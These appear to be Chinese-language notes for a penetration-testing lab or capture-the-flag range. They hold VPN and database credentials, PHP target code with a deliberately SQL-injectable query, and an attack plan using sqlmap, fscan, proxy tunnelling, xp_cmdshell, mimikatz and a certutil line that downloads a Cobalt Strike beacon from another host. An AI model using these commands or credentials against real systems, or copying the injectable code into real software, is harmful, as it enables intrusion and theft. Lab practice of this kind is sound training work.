# pst:2024年12月2日

反弹IP![2bb7fc7ece72ec66fd3dc30cb99a3e6](C:\Users\sec\scoop\persist\wechat\WeChat Files\xuexin_chen\FileStorage\Temp\2bb7fc7ece72ec66fd3dc30cb99a3e6.png)

# vpn

1. Cisco AnyConnect Secure Mobility Client
101.37.160.193:62443
2. 场景测试/mxl49dm9
3. 场景测试二/f40sbwfd 1
4. 场景测试三/6bmc0cvm


2. OpenConnect-GUI VPN client
https://192.168.197.110:10034
1. student/Student@User~69 1
2. studentN/1qaz@WSX4
3. studentM/1qaz@WSX33

# 靶机

C:/phpstudy_pro/WWW/juece/login/login.php

<?php  
session_start(); // 始终开始会话  
  
// 数据库配置  
$host = '127.0.0.1';  
$dbname = 'security';  
$username = 'root';  
$password = 'yancaokaoshi123#';  
  
try {  
    $pdo = new PDO("mysql:host=$host;dbname=$dbname", $username, $password);  
    // 设置 PDO 错误模式为异常  
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);  
  
    // 获取输入的用户名和密码  
    $userid = isset($_POST['userid']) ? $_POST['userid'] : '';  
    $password = isset($_POST['password']) ? $_POST['password'] : '';  
    // 假设密码已经过哈希处理  
    $stmt = $pdo->prepare("SELECT * FROM users WHERE username = ? AND password = ?");  
    $stmt->execute([$userid, hash('md5', $password)]); // 假设存储时使用了sha256哈希  
  
    if ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {  
        // 登录成功  
        // 设置cookie  
    $token = bin2hex(random_bytes(32));
    $token_expiration = time() + 86400;
    $stmt = $pdo->prepare("INSERT INTO user_tokens ( token, expiration) VALUES ( ?, ?)");
    $stmt->execute([ $token, $token_expiration]);
    setcookie("user_token", $token, $token_expiration);

        // 重定向到新的URL  
    sleep(10);
        header("Location: /juece/login/index.php");  
        exit;  
    } else {  
        // 登录失败  
    #echo hash('md5', $password);
        echo "用户名或密码错误";  
    }  
} catch(PDOException $e) {  
    echo "数据库连接失败: " . $e->getMessage();  
}  
?>


C:/phpstudy_pro/WWW/juece/login/sql.php

<?php  
// 数据库连接参数  
$servername = "localhost";  
$username = "root";  
$password = "yancaokaoshi123#";  
$dbname = "security";  
header('content-type:text/css;charset=gbk');
// 创建连接  
$conn = new mysqli($servername, $username, $password, $dbname);  
  
// 检查连接是否成功  
if ($conn->connect_error) {  
    die("连接失败: " . $conn->connect_error);  
}  
  
// 从GET参数中获取username,并且没有做任何过滤或转义(这是非常危险的!)  
$id = isset($_POST['username']) ? $_POST['username'] : '';  
  
// 构造SQL查询(这里非常危险,因为它容易受到SQL注入攻击)  
$sql = "SELECT * FROM users WHERE id = '$id'"; // 假设你有一个名为users的表,并且它有一个名为id的列  
#echo $sql;
// 执行查询  
$result = $conn->query($sql);  
  
if ($result->num_rows > 0) {  
    // 输出数据  
    while($row = $result->fetch_assoc()) {  
        #echo "ID: " . $row["id"]. " - Name: " . $row["username"]; // 假设你的表有name列  
    }  
} else {  
    echo "没有找到与给定ID匹配的结果";  
}  
  
// 关闭连接  
$conn->close();  
?>




1. http://192.168.100.2:8082/

[phpinfo](http://192.168.100.2:8082/juece/info.php) 收集绝对路径`C:/phpstudy_pro/WWW`,前端弱口令,拿到1个`flag`,

查询sqlmap-post注入、数据库users表1个`flag`,拿到shell、

目录`C:/phpstudy_pro/flag.txt`1个`flag`,收集MySQL数据库配置,

上线CS(可选),搭建frp/ew代理,fscan 探测内网

192.168.1.2 内网


   fscan.exe -h 192.168.1.0/24 -o fscan-192.168.1.0.txt
   


172.29.255.253 对应反弹IP 192.168.100.243



2. mssql 数据库
使用 MySQL收集的信息连接,数据库1个flag
利用 xp_cmdshell 提权 mimikatz

EXEC xp_cmdshell 'certutil -urlcache -split -f http://192.168.80.178/beacon_x64.exe C:\Windows\Temp\beacon_x64.exe';


上线CS(可选)
 
 
Back to Top